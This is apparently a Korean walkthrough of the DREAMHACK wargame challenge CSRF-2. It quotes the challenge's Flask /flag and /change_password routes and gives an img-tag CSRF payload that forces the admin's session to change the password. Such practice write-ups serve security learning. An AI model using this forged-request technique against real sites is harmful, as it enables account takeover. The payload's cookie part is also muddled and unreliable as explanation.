[DREAMHACK 워게임] 웹해킹_CSRF-2 문제풀이

300

 

이 문제의 중요한 점은 admin의 비밀번호가 flag이고
admin으로 로그인하면 home화면에 flag가 출력된 다는 것이다.
-> 따라서 우리가 고민해야하는 것은 admin으로 그럼 어떻게 구할 것인가 이다

 

 

이때 코드를 살펴보면

@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param", "")
        session_id = os.urandom(16).hex()
        session_storage[session_id] = 'admin'
        if not check_csrf(param, {"name":"sessionid", "value": session_id}):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'

이때 중요한 것은 /flag를 통해 보내게 된다면 session_id가 만들어지고 이가 'admin’값으로 저장되는 것이다. 따라서 이때 admin의 session_id가 새로 생긴 다는 의미이다.
그 후 check_csrf를 통해 sessionid라는 이름으로 값이 전송된다.

그리고 코드에만 있는 라우터를 보면
/change_password에서 sessionid값이 같으면 비번을 바꾸는 것을 알 수 있다.

@app.route("/change_password")
def change_password():
    pw = request.args.get("pw", "")
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html', text='please login')

따라서 /flag 페이지에서
<img src=“./change_password?pw=1234&sessionid=document.cookie”/>
해당 값을 입력하면 admin의 비번이 바뀌기에 DH값을 구할 수 있다.```